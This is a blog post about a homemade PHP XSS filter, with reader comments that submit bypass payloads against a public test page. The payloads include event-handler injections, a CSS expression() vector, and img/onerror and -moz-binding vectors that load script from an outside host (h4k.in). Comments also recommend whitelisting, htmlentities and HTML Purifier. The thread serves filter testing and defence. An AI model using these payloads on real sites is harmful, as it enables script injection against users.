XSS – How we try to prevent it.

Cross Site Scripting aka XSS is increasingly a problem with a lot of webapps and there’s an ongoing discussion on the phpsec mailinglist about that.

We try to prevent that since some time with different approaches. For example, we allow only certain tags in comments (with the help of strip_tags()), we don’t make links clickable, and use tidy for further clean up, but we also wrote a little method, which tries to clean the most common exploit attempts with some preg magic. But I doubt, that we catch every possible exploit…

Therefore I ask my readers, if they know of some more exploits to further improve this method. The source code of the method can be found here and you can test it out at http://php5.bitflux.org/xss.php. If you manage to somehow show up an alert box (through a click or even without), you succeeded and I ask you to report that to me, so we will add further checks into that method. Please mail it to me, it will most certainly not work in the comments (or just the exploit will work, but I’ll be fast in removing such comments ;) )

The test script does not use tidy or strip_tags or anything other than the method mentioned above. Of course, feel free to use it for your own projects, if you like to.

Happy Hacking ;)

Update: Already found some weaknesses. Updated the method. Will blog about the improvements later. Furthermore, the method doesn’t care about CSS hacks, so yes, you can change the color of the site with it ;) I’m only intrested in “real” XSS exploits, meaning you can somehow inject javascript into it.

Update II: I wrote a little wiki article about what the script does and what common exploits are.

Your script is a good thing. But I think is the false way of security thinking.

Hacker have a lot of energie to find new ways to hack your system. So don’t try to find out which will be the posibilities to hack your system and filter them out. Even how hard you try this, there will be a methode left that you can’t think of.

So try I different system, think about the positiv way. Only a small set of posibilites will accept (some very usual character wich you think a normal user will use) and look very carfully that they can’t destroy your system. A good error handling is also needed. Left the posibilities to contact you when a input will not except from the system so
when you don’t have thinked about a needed input you can add this afterwards to your system.

Leo: Thanks for your input. This cleaning is just part of the whole process. I later remove every tag not allowed (white-, not blacklisted), for example.

But yes, your approach is certainly a good way, but one does not exclude the other ;)

Your tool is far from ideal.

First try was succesful: test

You can see my tool at http://pixel-apes.com/safehtml =)


First try was:

<b style=”color:red;”onmouseover=”alert(1)”>test</b>

kukutz: I fixed that problem. I looked at your tool, looks nice. Will look closer later.

And I don’t claim, my tool is perfect. It just tries to prevent some basic xss attacks. But I certainly will improve it.

Ah, and your first attempt didn’t succeed, as we do allow some html tags, but also do an tidy before sending it to the cleaning method. So tidy added a space between the attributes, which was correctly matched by the cleaning method.

I would suggest looking at _cleanHTML() in http://cvs.horde.org/co.php/framework/MIME/MIME/Viewer/html.php
This method has evolved over a few years and being the HTML filter used in IMP you can be assured that people tried to hack that a lot of times. Of course they succeeded a few time, which lead to improved versions.

Hi chregu,

I wrote twe (twe whitelist enforcer) to protect my applications.

(License: lgpl)

I would be glad to get some feedback.

Should I use htmlentities() with this function? before or after?

It seems pretty bulletproof for now. I couldn’t get anything from:

to work on it. Good work!


Your script is “cleaning” the word “only” as it appears anywhere in the html. It tried the following in your test page – a simpl HTML comment, and it was “cleaned” incorrectly – (I hope htis works). Try inserting this into your test page, and you’ll see what I mean:

If you copy stuff of mine, please acknowledge me in your profile, it’s only fair.

I’ve tried

It works in IE and your script doesn’t remove this!

sorry my tag seem to be auto-deleted
it looks like
{IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”}

Mine didn’t work.

Did you try it in IE?

I got in with:

onmouseover=”alert(‘Javascript is executed’);”>text

Gah, i’ve e-mailed it to you anyway :)

this simple script goes works in firefox ..
im using the hex representation of the hex representation of the j in javascript.


I got it with this:

put < at both the beginning and the end !
body onload=alert(‘xxs!!!’)

Once and for all again : The script is not perfect and you shouldn’t use it as your only line of defence…
For example, used together with tidy

{body foo=”onLoad”}” onLoad=”alert(1);”}

I would rather prefer htmlspecialchars() in security sensitive applications if formatting isnt really neccessary

I don’t understand why htmlentities($var,ENT_QUOTES);

is not used. XSS isn’t exactly the hardest thing to get rid of and shouldn’t take some super extensive script to solve. Going from JS/CSS/HTML/XML and filtering function to function is way too difficult and you’re bound to miss something. A simple htmlentities() call solved every single problem with any code that has exploited your script as
now. Nothing can funtion in the middle of a code line by itself, so kill the beginning and the end generically and be done with the entire situation.

biz: If you want to allow for some reason HTML as input, you have to filter it somehow.. (and there are certainly reasons for that)

But if you don’t need/want HTML, then yes, please use htmlentities/htmlspecialchars…

Your wiki seems to be down for a few days now. Also, Google doesn’t seem to have a cache of the page, neither does archive.org. Did you take it down for good? Note that the error I’m getting is 403, not 404.

It’s here:


and the redirect works again as well :)


This works like a shine… try php-ids.org ;)


Sorry – correct vector:


(needs to be url decoded – couldn’t post it without)

another one (FFox 1.x-2.x)


So, it maybe does work with the filter only (your code is not really readable anymore), but doesn’t seem to work here together with tidy, or do I miss something?

I always said, that this script should not be your only line of defense, but be used together with some HTML cleaner like tidy

PS. The XBL one does indeed work without tidy, but should be easy to filter out, the second, the “onerror” case, I really can’t reproduce


“your code is not really readable anymore” we’re dealing with url encoded code here – where is this not readable?

It’s pretty easy to reproduce when knowing that you can attach any attribute to any tag with a slashes and other special chars – not only with spaces. Like <tag/attribute=

“><img/onerror=a=document.createElement(‘script’);a.src=’http://h4k.in/i.js’;document.body.appendChild(a); src=1>


And never forget the non-alpha-non-digit issues when dealing with XSS on a seriuos manner…


P.S.: The email notification doesn’t work

Yes, I managed to read your code :)
I added a moz-binding filter to the cleaning code, but I still stay behind my statement: Do not use this as your own line of defense, together with tidy for example a lot of those injection vectors are solved in the first place, especially the malformed ones

Here’s another beauty:


.. I CAN REALLY PUT ANYTHING BETWEEN THE LINE BREAKS, $&§&!… style=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>XSS</h1>

Shall we continue this talk via mail?

Look, I believe you, that you can find many many more examples, I never ever said, that it’s 100% bulletproof without tidy. If you find something together with tidy, then I’m more than happy, to fix it. Here’s the testsite for you with no output without tidy filtering (to make it easier for you): http://php5.bitflux.org/xsstidy.php

But of course I’m still interested in improving the script and I value any input, maybe I will try to fix the stuff you found. But the regexes get bigger and bigger for stuff that can be cleaned easily otherwise..

Tidy brings great problems because it allows data urls. Take base64 encoded JS, wrap it into a data url, place it inside an image source, open the page with IE6 and the script will be executed.

Btw – did you try HTML purifier? In my opinion this solution IS bulletproof because the filtering is way more thorough than tidy’s approach. It uses a tokenizer/lexer and validates the the input against a whitelist – the DTD.


I tried HTML Purifier for a webmail project. It’s easy to use and the most bulletproof filter I found so far. Also does a decent (not perfect) job in preserving the original layout. The downside is it’s speed. For complete html documents (~10KB), HTML Purifier added an additional 1000-2000 msec processing time. This was under perfect conditions
(dedicated server, opcode caching, single user). Compared to the original 50-100 msec, this was huge.
Imho it could still do a *very* good job for small amounts of data.

Sorry, the line was erased.
look for “Double open angle brackets”
on http://ha.ckers.org/xss.html

works on ff2.

Great script otherwise, keep up the good work!

<html><script>alert(‘hello’)</script><h1>HACKING TEST!</h1></html>

funny guy…

htmLawed, bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php , is a new PHP script like HTML Purifier that can be used to make HTML in input text more secure and standard-compliant, and to administratively restrict HTML elements, attributes, etc. It is a single file script of ~45 kb with low memory usage, and is highly